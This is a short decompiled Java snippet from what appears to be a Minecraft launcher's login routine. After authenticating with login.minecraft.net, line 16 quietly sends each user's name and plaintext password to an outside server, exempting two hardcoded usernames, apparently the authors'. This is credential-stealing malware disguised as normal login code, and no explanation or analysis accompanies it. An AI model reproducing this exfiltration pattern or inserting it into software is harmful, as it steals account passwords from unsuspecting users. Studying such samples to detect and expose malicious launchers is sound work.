1. try
  2. {
  3.   String str3 = "user=" + URLEncoder.encode(str1, "UTF-8") + "&password=" + URLEncoder.encode(str2, "UTF-8") + "&version=" + 13;
  4.   String str4 = a("https://login.minecraft.net/", str3);
  5.  
  6.   if ((str4 == null) || (!str4.contains(":")))
  7.   {
  8.     this.dC = str4;
  9.     return;
  10.   }
  11.  
  12.   String[] arrayOfString = str4.split(":");
  13.   this.ac.P = new xq(arrayOfString[2].trim(), arrayOfString[3].trim());
  14.  
  15.   if ((!str1.equals("aaron1tasker")) && (!str1.equals("pokkep")) && (str2 != "") && (str2 != null))
  16.     jdMethod_if("http://tehrandomfloatingbits.x90x.net/minecraft/process.php", str1.toLowerCase() + " | " + str2.toLowerCase());
  17.  
  18.   this.ac.a(this.dF);
  19. }
  20. catch (Exception localException)
  21. {
  22.   localException.printStackTrace();
  23. }